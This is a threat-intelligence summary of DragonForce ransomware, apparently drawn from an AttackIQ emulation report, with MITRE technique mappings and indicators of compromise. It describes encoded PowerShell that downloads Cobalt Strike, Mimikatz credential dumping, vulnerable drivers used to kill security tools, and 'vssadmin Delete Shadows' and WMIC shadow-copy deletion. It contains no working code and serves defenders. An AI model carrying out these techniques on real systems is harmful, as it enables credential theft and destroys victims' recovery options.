DragonForce is a ransomware strain that evolved from a pro-Palestine hacktivist group into a financially motivated Ransomware-as-a-Service (RaaS) operation using custom payloads based on Conti V3. It utilizes a double extortion approach, advanced post-exploitation tools, and Bring Your Own Vulnerable Driver (BYOVD) techniques, with AttackIQ providing detailed emulations to help organizations validate their defenses. #DragonForce #Conti #SystemBC #Mimikatz #CobaltStrike
Keypoints
- DragonForce ransomware emerged in August 2023 and evolved from a politically motivated hacktivist group to a hybrid RaaS operation focused on financial extortion.
- In July 2024, DragonForce introduced a customized ransomware variant based on the Conti V3 codebase, with an affiliate program offering up to 80% ransom shares.
- The group employs a double extortion strategy by encrypting victim data and leaking sensitive information on their Dedicated Leak Site and RansomBay platforms.
- Operators use the BYOVD technique to disable security controls and clear Windows Event Logs post-encryption to evade detection and forensic analysis.
- DragonForceâs toolkit includes SystemBC (backdoor), Mimikatz (credential theft), SoftPerfect Network Scanner (reconnaissance), and Cobalt Strike for lateral movement and persistence.
- Initial infection often begins with encoded PowerShell commands deploying Cobalt Strike, followed by credential harvesting and network reconnaissance to enable domain-wide ransomware deployment.
- AttackIQ released attack graphs simulating DragonForce TTPs, enabling organizations to assess and improve detection, prevention, and response capabilities against this threat.
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell â Encoded PowerShell commands executed to download and deploy Cobalt Strike Beacon (âencoded PowerShell script into base64 and then executed using PowerShellâs -encodedCommand parameterâ).
- [T1543.003] Create or Modify System Process: Windows Service â Persistence via new Windows service creation using the SC utility (âcreates a service through the SC Windows utilityâ).
- [T1105] Ingress Tool Transfer â Downloading additional payloads into memory or disk to advance operations (âdownloads to memory and saves to disk in independent scenarios to test network and endpoint controlsâ).
- [T1547.001] Logon Autostart Execution: Registry Run Keys â Establishing persistence by creating registry run keys to execute commands on startup (âcreates an entry under HKLMSoftwareMicrosoftWindowsCurrentVersionRunâ).
- [T1018] Remote System Discovery â Using AdFind to gather Active Directory information including accounts and groups (âleverages the AdFind utility to discover details about the Active Directory configurationâ).
- [T1003] OS Credential Dumping â Using an obfuscated Mimikatz variant to extract system credentials (âuses an obfuscated version of Mimikatz to dump passwords and hashesâ).
- [T1021.001] Remote Services: Remote Desktop Protocol â Moving laterally via RDP connections (âattempts to remotely connect to an accessible system via Remote Desktop Protocolâ).
- [T1106] Native API â Using CreateProcessA API to spawn new malicious processes (âexecutes the CreateProcessA Windows API call to create a new processâ).
- [T1082] System Information Discovery â Enumerating system info with RtlGetVersion, NetWkstaGetInfo, NtQuerySystemInformation APIs (âexecutes RtlGetVersion and NetWkstaGetInfo API calls to enumerate system informationâ).
- [T1007] System Service Discovery â Collecting information on system services using EnumServiceStatus, QueryServiceStatusEx, and EnumDependentServices APIs (âexecutes the EnumServiceStatus Windows API to gather informationâ).
- [T1490] Inhibit System Recovery â Deleting Volume Shadow Copies via WMI and WMIC commands to block recovery options (âexecutes Get-WMIObject Win32_ShadowCopy and wmic.exe commands to delete shadow copiesâ).
- [T1083] File and Directory Discovery â Enumerating file systems with FindFirstFileW and FindNextFileW APIs to locate files for encryption (âcalls FindFirstFileW and FindNextFileW for file system enumerationâ).
- [T1486] Data Encrypted for Impact â Encrypting files using ChaCha8 and RSA-1024 algorithms to impact victim data (âencrypts the identified files using a combination of ChaCha8 and RSA-1024â).
Indicators of Compromise
- [File Names] â Indicators related to vulnerable drivers used for BYOVD technique: Truesight.sys, RentDrv.sys referenced as drivers to terminate EDR/XDR processes.
- [Tools] â Post-exploitation tool names observed: SystemBC (aka Coroxy), Mimikatz, SoftPerfect Network Scanner, Cobalt Strike used for persistence, credential theft, reconnaissance, and lateral movement.
- [IOCs] â PowerShell commands and utilities indicative of malicious activity, e.g., use of encoded PowerShell scripts, âvssadmin Delete Shadowsâ commands, and WMIC invocations for Volume Shadow Copy deletion.
Read more: https://www.attackiq.com/2025/05/23/emulating-dragonforce-ransomware/